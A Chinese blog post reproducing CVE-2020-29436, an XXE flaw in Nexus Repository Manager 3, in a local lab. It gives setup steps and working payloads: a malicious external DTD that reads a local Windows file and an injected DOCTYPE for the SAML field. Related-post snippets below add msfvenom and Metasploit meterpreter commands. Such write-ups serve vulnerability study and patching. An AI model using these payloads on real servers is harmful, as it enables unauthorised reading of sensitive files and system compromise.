【漏洞复现】CVE-2020-29436:Nexus3 XML外部实体注入

最新推荐文章于 2025-03-18 17:18:30 发布
最新推荐文章于 2025-03-18 17:18:30 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: xml
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zzgslh/article/details/113687641
版权

一、 Nexus简介

Nexus Repository Manager 3是一款通用的软件包仓库管理(Universal Repository Manager)服务。

二、漏洞概述

编号:CVE-2020-29436
/service/rest/internal/ui/saml接口允许加载外部dtd。攻击者如果能够获取 Nexus Repository Manager 3 的管理员帐户,就可以配置系统、查看文件系统上的文件,获取敏感信息。

三、环境搭建

提示:本地搭建需要JDK1.8以上版本。
(1)下载Nexus Repository Manager 3.28.1-01环境:
链接地址:https://help.sonatype.com/repomanager3/download/download-archives—repository-manager-3
网盘链接:https://pan.baidu.com/s/13GekraTeZmKvS52nIkRuLw
提取码:5vcd
在这里插入图片描述
(2)下载完成解压,到nexus-3.28.0-01\bin目录下,打开命令行运行nexus.exe /run。

在这里插入图片描述
在这里插入图片描述
(3)浏览器访问:http://127.0.0.1:8081。
在这里插入图片描述
(4)登录:默认密码在/sonatype-work/nexus3目录下的admin.password文件下。
在这里插入图片描述
在这里插入图片描述

(5)登录成功,需要修改密码这里随便修改一下,然后选择匿名访问。
在这里插入图片描述
(6)安装证书。
在这里插入图片描述

我这里是装过的,大家复现时如果无法访问saml接口,则需要装一下证书的,需要访问如下链接:
https://www.sonatype.com/nexus/repository-pro/trial

注册,这一块的信息随便填即可:
在这里插入图片描述
下载证书,安装即可。
在这里插入图片描述

漏洞复现

1.访问Security下的SAML功能,这里可以提交XML数据。
在这里插入图片描述
2.先用python起一个http服务,然后将如下payload放在http服务的目录下,命名为my.dtd文件。

<!ENTITY % file SYSTEM "file:///C:/Windows/win.ini">
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM '%file;'>">
%all;
%send;

在这里插入图片描述

3.将payload插入到文本框中:

<!DOCTYPE ANY [
<!ENTITY % dtd SYSTEM "http://127.0.0.1:800/my.dtd">
%dtd;
]>
<ANY>xxe</ANY>

在这里插入图片描述
4.Save保存,burp抓包。
在这里插入图片描述
在这里插入图片描述
5.读取本地文件成功:
在这里插入图片描述

四、修复方式

及时升级到最新版本即可。

注入补丁_【更新】Sonatype Nexus Repository Manager外部实体注入漏洞CVE202029436
weixin_30119911的博客
01-13 832
漏洞名称 :Sonatype Nexus Repository Manager外部实体注入漏洞CVE-2020-29436威胁等级 : 高危影响范围:Nexus Repository Manager 3<=3.28.1漏洞类型 : XML外部实体注入利用难度 : 简单 漏洞分析 1Nexus Repository Manger介绍Nexus 一个是Mave...
Nexus Repository Manager3( CVE-2020-10199) 远程命令执行漏洞排查
dayouzi的博客
08-14 1356
nexus的全称是Nexus Repository Manager,是Sonatype公司的一个产品。它是一个强大的仓库管理器,极大地简化了内部仓库的维护和外部仓库的访问。主要用它来搭建公司内部的maven私服。但是它的功能不仅仅是创建maven私有仓库这么简单,还可以作为nuget、docker、npm、bower、pypi、rubygems、git lfs、yum、go、apt等的私有仓库,功能非常强大。
[Timeline Sec] - CVE-2020-29436Nexus3 XML外部实体注入复现1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介Repository Manager)服务。0x02 漏洞概述编号:CVE-2020-29436/servic
XML注入CVE-2020-29436
守拙的博客
07-21 786
一、漏洞名称: Nexus Repository Manager 3 XML外部实体注入 二、漏洞编号: CVE-2020-29436 三、漏洞描述: 2020年12月16日,360CERT监测发现Nexus Repository Manager 3发布了Nexus Repository Manager 3 命令注入漏洞 的风险通告,该漏洞编号为 CVE-2020-29436漏洞等级:高危 ,漏洞评分:8.7 。 拥有管理员权限的远程攻击者通过 构造特定的XML请求 ,可造成 XML外部实体
Nexus Repository 3 必知必修的高危漏洞
最新发布
PJzhangSec的博客
03-18 266
【代码】Nexus Repository 3 必知必修的高危漏洞
CVE-2020-15012:Nexus Repository Manager 2 目录遍历漏洞通告
爱国小白帽
10-09 953
CVE-2020-15012:Nexus Repository Manager 2 目录遍历漏洞通告 原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-100901 报告来源:360CERT 报告作者:360CERT 更新日期:2020-10-09 0x01 漏洞简述 2020年10月09日,360CERT监测发现 nexus repository manager 2 发布了 nexus repository manager 2 目录穿
CVE-2020-13933 靶场: shiro 认证绕过漏洞.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
CVE-2020-29436Nexus3 XML注入漏洞复现与exploit
本文档对于理解和防御类似CVE-2020-29436这样的XML外部实体注入漏洞提供了实用的指南,对IT安全专业人员和系统管理员来说具有很高的参考价值。务必注意,未经授权的攻击行为将触犯法律,因此在任何情况下都应遵循...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
pom.xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http:
Nexus 3 任意修改admin密码越权漏洞
Lemon1006的博客
07-04 1741
个人博客:https://blog.gxzhang.cn 请大家多多关照呀 0x01 编号:CVE-2020-11444 漏洞影响版本范围和危害是和CVE-2020-10199、CVE-2020-10204前后一个月时间出现的,爆出了10199和10204后面的一个补丁修复之后,再次爆出的11444漏洞Nexus 3 任意修改admin密码越权漏洞,可以用低权限用户登录获取sessionID越权进行修改admin用户的密码 0x02 首先,通过CVE-2020-10199登录admin.
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10199)
ch258563的博客
06-06 1842
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10199)
CVE-2020-10199 Nexus Repository Manager 3 远程命令执行漏洞复现
ierciyuan的博客
08-01 1344
CVE-2020-10199 Nexus Repository Manager 3 远程命令执行漏洞复现。测试漏洞并反弹shell。
nexus-3.28.1-01升级到nexus-3.38.0-01
weixin_44919041的博客
03-28 8045
1.升级缘由(腾讯云安全漏洞扫描) 因为nexus3.28存在一下几个漏洞,均为高危漏洞 1.XStream < 1.4.18 多个远程代码执行漏洞 (CVE-2021-39139等) 2.XStream 多个高危风险 (CVE-2021-21341等) 3.Apache Shiro 身份验证绕过漏洞 (CVE-2021-41303) 4.Apache Shiro 权限绕过漏洞 (CVE-2020-17523) 2.升级过程 1. 如果没有安装nexus-3.28.1-01可以直接安装n
Nexus 3越权漏洞(CVE-2020-11444)
m0_65150886的博客
02-18 1053
Nexus Repository Manager 3.x OSS / Pro <= 3.21.1Nexus 3的版本中,存在任意修改admin密码越权漏洞,攻击者可以用低权限用户登录获取sessionID越权进行修改admin用户的密码。Nexus Repository是一个开源的仓库管理系统,可搭建npm、maven等私服。3.F12,打开开发者模式,在应用程序中查找NXSESSIONID。1.访问http://ip:port,出现如下页面,开始实验。2.点击登录,输入默认账号密码进行登录。
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
weixin_45260839的博客
05-29 1770
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
简单聊聊CVE-2020-13379
一个安全研究员
08-04 8255
多次跳转导致的ssrf
cve2020-0796代码执行漏洞复现详细过程(不成功)
anlalu233的博客
06-06 5415
win10:192.168.254.129 kali:192.168.254.128 生成反向连接木马: msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python kali打开msf: use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set lport 4444 set rhost 192.168.254.1
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值